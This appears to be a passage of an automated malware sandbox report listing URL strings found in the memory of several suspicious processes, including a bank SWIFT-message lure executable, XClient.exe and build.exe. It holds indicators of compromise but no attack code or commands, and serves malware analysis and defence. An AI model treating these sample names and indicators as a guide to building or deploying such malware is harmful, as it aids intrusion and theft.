Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe, 00000000.00000002.2142691697.0000000002CA8000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, YkxAHNcqEmoeLS.exe, 0000000A.00000002.2180779322.0000000002708000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2349952614.000001E8AC0A1000.00000004.00000800.00020000.00000000.sdmp, apihost.exe, 0000001B.00000002.4577783321.00000000029F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
Source: powershell.exe, 00000015.00000002.2349952614.000001E8AC2C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/D
Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	String found in binary or memory: http://tempuri.org/DataSet1.xsd
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10Response
Source: build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10ResponseD
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.0000000003037000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.0000000002D9A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11Response
Source: build.exe, 00000009.00000002.2623500553.0000000002AF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11ResponseD
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12Response
Source: build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12ResponseD
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13Response
Source: build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13ResponseD
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14Response
Source: build.exe, 00000009.00000002.2623500553.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14ResponseD
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2645035144.0000000003BB9000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15
Source: XClient.exe, 00000008.00000002.2652391836.0000000002D9A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15Response
Source: build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15ResponseD
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16Response
Source: build.exe, 00000009.00000002.2623500553.0000000002C63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16ResponseD
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17Response
Source: build.exe, 00000009.00000002.2623500553.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17ResponseD
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18Response
Source: build.exe, 00000009.00000002.2623500553.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18ResponseD
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19Response
Source: build.exe, 00000009.00000002.2623500553.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19ResponseD
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1Response
Source: build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1ResponseD
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20Response
Source: build.exe, 00000009.00000002.2623500553.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20ResponseD
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21Response
Source: build.exe, 00000009.00000002.2623500553.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21ResponseD
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002BEC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22Response
Source: build.exe, 00000009.00000002.2623500553.0000000002C63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22ResponseD
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002C5E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23Response
Source: build.exe, 00000009.00000002.2623500553.0000000002C63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23ResponseD
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24Response
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2Response
Source: build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2ResponseD
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3Response
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4Response
Source: build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4ResponseD
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5Response
Source: build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5ResponseD
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6Response
Source: build.exe, 00000009.00000002.2623500553.0000000002BEC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6ResponseD
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7Response
Source: build.exe, 00000009.00000002.2623500553.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7ResponseD
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8Response
Source: build.exe, 00000009.00000002.2623500553.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8ResponseD
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002C63000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9Response
Source: build.exe, 00000009.00000002.2623500553.0000000002C63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9ResponseD
Source: powershell.exe, 00000015.00000002.2438212189.000001E8C44BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://wwcrosoft.com/pki/certs/MicWinPCA_2010-07-06.crt0
Source: powershell.exe, 00000015.00000002.2349952614.000001E8AC2C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: XClient.exe, 00000008.00000002.2931905344.000000001C7AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.3
Source: XClient.exe, 00000008.00000002.2931905344.000000001C6CB000.00000004.00000020.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2936268568.000000001C7F6000.00000004.00000020.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2645832584.0000000000DEB000.00000004.00000020.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2645832584.0000000000E29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: XClient.exe, 00000008.00000002.2931905344.000000001C6CB000.00000004.00000020.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2936268568.000000001C7F6000.00000004.00000020.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2645832584.0000000000DEB000.00000004.00000020.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2645832584.0000000000E29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: XClient.exe, 00000008.00000002.2692349903.000000001482B000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.000000001480F000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.000000001319F000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014578000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014FF1000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014AA7000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.00000000142E1000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.0000000003532000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000015288000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014AC3000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000015520000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.00000000142FD000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.000000001526D000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000015506000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.00000000131BA000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014FD5000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014594000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.000000000342B000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014D3E000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014D5A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2645035144.0000000004036000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: XClient.exe, 00000008.00000002.2940708264.000000001D020000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/
Source: powershell.exe, 00000015.00000002.2349952614.000001E8AC0A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
